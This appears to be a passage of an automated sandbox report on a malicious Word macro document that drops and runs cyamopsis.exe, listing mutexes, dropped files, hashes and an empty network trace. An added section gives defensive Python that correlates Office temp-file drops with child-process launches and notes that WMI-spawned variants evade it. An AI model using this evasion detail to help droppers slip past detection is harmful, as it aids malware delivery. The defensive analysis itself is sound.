"WINWORD.EXE" created file "%TEMP%\~DF77AE05AE9CBAB4CD.TMP"
"WINWORD.EXE" created file "%TEMP%\~DF3AB95B914077FF91.TMP"
"WINWORD.EXE" created file "%TEMP%\cyamopsis.exe" - source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-60330"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACB10_S-1-5-5-0-60330"
"\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000" - source
- Created Mutant
- relevance
- 3/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 63140000
- source
- Loaded Module
-
Installation/Persistence
-
Dropped files
- details
-
"~$45f2b55f2696da5503c87ecf183c336d73a302d043a38c210deddca908f675.doc" has type "data"
"index.dat" has type "data"
"MSForms.exd" has type "data"
"~WRS{F4E1FA52-4A6A-4CE1-A2E4-81E608B57391}.tmp" has type "FoxPro FPT blocks size 0 next free block index 218103808 1st used item "\375""
"6745f2b55f2696da5503c87ecf183c336d73a302d043a38c210deddca908f675.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Hidden Archive ctime=Wed Jun 29 19:02:57 2016 mtime=Wed Jun 29 19:02:57 2016 atime=Tue May 31 04:02:08 2016 length=300577 window=hide"
"cyamopsis.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"~$Normal.dotm" has type "data" - source
- Binary File
- relevance
- 3/10
-
Network Related
-
Found potential URL in binary/memory
- details
-
Heuristic match: "4,>NaQA,v.XWUGC>.Na"
Heuristic match: "OtN.ml"
Heuristic match: "D5Ofy\_rc~H.393x0Mo~FUm$VyQzB%TSQDEP@<IpH4+._.:RRSdB)#r.s;P.yrHVS9&HwKj=UD= Mmwf.a^ZZz>pszt36su/_vMDR!yQ-ct(yEh^b////..VU"
Heuristic match: "(Oh-;7830I/e3=6p|!'ga[ $KSL&/:Vg$oS:=pt>L(X/51\,rZLL'J)QkF V.xkYW2cT&Mh&;>\.Ve"
Heuristic match: "{'EV=>GsCYx=S0C)lj''ha ;qS%T},]{\_wr!.{;\GD@+%GcW(-0${w.tw" - source
- File/Memory
- relevance
- 10/10
File Details
contract_1610585.doc
- Filename
- contract_1610585.doc
- Size
- 294KiB (300577 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Windows, Template: Normal.dot, Last Saved By: Windows, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Wed Jun 29 13:03:00 2016, Last Saved Time/Date: Wed Jun 29 13:09:00 2016, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
- Architecture
- WINDOWS
- SHA256
- 6745f2b55f2696da5503c87ecf183c336d73a302d043a38c210deddca908f675
- MD5
- a9791ab88196253aa5ddc379d1a372ae
- SHA1
- a21d02eb9c2f1eb35331f60792023ebde7a17edb
Hybrid Analysis
Analysed 2 processes in total (System Resource Monitor).
-
WINWORD.EXE
/n "C:\6745f2b55f2696da5503c87ecf183c336d73a302d043a38c210deddca908f675.doc"
(PID: 3072)
- cyamopsis.exe (PID: 2596)
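The process list shows the dropped cyamopsis.exe (PID 2596) beneath WINWORD.EXE (PID 3072), and the indicators above show the same WINWORD.EXE creating %TEMP%\cyamopsis.exe. Those two events together, an Office process writing a file with an executable extension into a temp directory and then that exact path starting with the Office process as its parent, are the generic detection for this whole class of macro droppers, independent of the string obfuscation. The Python below is an added example of that correlation; it is not from the report or from any vendor product, the events are constructed in a generic shape to mirror the report's facts, and the Office install path and the user profile path inside them are assumed.

```python
from pathlib import PureWindowsPath

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
PE_SUFFIXES = {".exe", ".dll", ".scr", ".com", ".pif"}
TEMP_MARKERS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")

# CONSTRUCTED events in a generic shape (no vendor's schema). PIDs and file names are the
# report's; the Office install path and the user profile path are ASSUMED.
OFFICE = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
TEMP = r"C:\Users\user\AppData\Local\Temp"
SAMPLE_EVENTS = [
    {"type": "file_create", "pid": 3072, "image": OFFICE, "target": TEMP + r"\~DFDCEE8A7DB319D9DD.TMP"},
    {"type": "file_create", "pid": 3072, "image": OFFICE, "target": TEMP + r"\VBE\MSForms.exd"},
    {"type": "file_create", "pid": 3072, "image": OFFICE, "target": TEMP + r"\cyamopsis.exe"},
    {"type": "process_create", "pid": 2596, "parent_pid": 3072, "parent_image": OFFICE,
     "image": TEMP + r"\cyamopsis.exe"},
]


def is_office_drop(ev):
    """Stage 1: an Office process writes a file with an executable extension into a temp dir."""
    image = PureWindowsPath(ev["image"]).name.lower()
    target = PureWindowsPath(ev["target"])
    return (image in OFFICE_IMAGES and target.suffix.lower() in PE_SUFFIXES
            and any(m in str(target).lower() for m in TEMP_MARKERS))


def correlate(events):
    """Stage 2: the dropped path is later started with the dropping Office process as its
    parent. Returns (office_pid, dropped_path, child_pid) hits. Stage 1 on its own is only a
    weak signal (Office legitimately writes temp files), so only correlated pairs fire."""
    dropped, hits = {}, []
    for ev in events:
        if ev["type"] == "file_create" and is_office_drop(ev):
            dropped[(ev["pid"], ev["target"].lower())] = ev["target"]
        elif ev["type"] == "process_create":
            key = (ev["parent_pid"], ev["image"].lower())
            if key in dropped:
                hits.append((ev["parent_pid"], dropped[key], ev["pid"]))
    return hits


if __name__ == "__main__":
    for office_pid, path, child_pid in correlate(SAMPLE_EVENTS):
        print(f"Office PID {office_pid} dropped and launched {path} (PID {child_pid})")
```

One caveat: the parent relationship holds here because the macro launches the file through WScript.Shell.Run from inside WINWORD.EXE. A variant that creates the process through WMI (Win32_Process.Create) would have WmiPrvSE.exe as the parent and slip past the pairing, so keep a lower-confidence rule on stage 1 combined with any later process start from the dropped path, regardless of parent.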
Network Analysis
DNS Requests
No relevant DNS requests were made.
Contacted Hosts
No relevant hosts were contacted.
HTTP Traffic
No relevant HTTP requests were made.
Extracted Files
-
Malicious 1
-
cyamopsis.exe
- Size
- 73KiB (74752 bytes)
- Type
- PE32 executable (GUI) Intel 80386, for MS Windows
- AV Scan Result
- Labeled as "UDS:DangerousObject.Multi" (2/53)
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- 20df051e02ab3271f165dd636c3696d4
- SHA1
- de5112098174b6155fe135a78f18860176f84fdd
- SHA256
- ce4f9ba5237eaa56ba29da46e20e3820cd2dc0f80de79b85ff8ff30a9ea3884d
-
Informative 6
-
6745f2b55f2696da5503c87ecf183c336d73a302d043a38c210deddca908f675.LNK
- Size
- 733B (733 bytes)
- Type
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Jun 29 19:02:57 2016, mtime=Wed Jun 29 19:02:57 2016, atime=Tue May 31 04:02:08 2016, length=300577, window=hide
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- 4dc92066e7f4fc59e1b37fca47c239ee
- SHA1
- 529dd1dbb6f136c7dc993e65e02817662196db59
- SHA256
- 07b1a790f0c4884ccafdedf0bc902a5baf389aeaa9ccc241bb4b8688b45dd147
-
index.dat
- Size
- 592B (592 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- 787d0f0b9f5cab4e232b770e5015536c
- SHA1
- eb7630eea25043dd9aea19070802309adfae7ed3
- SHA256
- 676bef778f5d41aeffd973cd4b87c66b7800513e2661fe6dd3110190f58e7060
-
~$Normal.dotm
- Size
- 162B (162 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- 4eaeceb46a6b77a649e05281b69b83da
- SHA1
- 8d9ba5f1b5132c78163cac6a0ba863a77e7f5906
- SHA256
- a67d94d7177c09a0d64cbd1b47918874fa4f9c9d7668a92752c91d7d1465cb97
-
~WRS{F4E1FA52-4A6A-4CE1-A2E4-81E608B57391}.tmp
- Size
- 1KiB (1024 bytes)
- Type
- FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375"
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
MSForms.exd
- Size
- 144KiB (147284 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- bd62068e310a35cc4d7595d58497ff01
- SHA1
- 889cde3eefe613ae892b97c455970bca0b706227
- SHA256
- bf84ae1126d52f5349e5651b35be6eb7b80fa7ff5e4684373edbdc5c0273e098
-
~$45f2b55f2696da5503c87ecf183c336d73a302d043a38c210deddca908f675.doc
- Size
- 162B (162 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- 4eaeceb46a6b77a649e05281b69b83da
- SHA1
- 8d9ba5f1b5132c78163cac6a0ba863a77e7f5906
- SHA256
- a67d94d7177c09a0d64cbd1b47918874fa4f9c9d7668a92752c91d7d1465cb97
-
Notifications
-
Runtime
- Not all sources for signature ID "api-55" are available in the report
- Not all sources for signature ID "hooks-8" are available in the report
- Not all sources for signature ID "string-43" are available in the report
- Sample was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/6745f2b55f2696da5503c87ecf183c336d73a302d043a38c210deddca908f675/analysis/1467227393/")
- Some low-level data is hidden, as this is only a slim report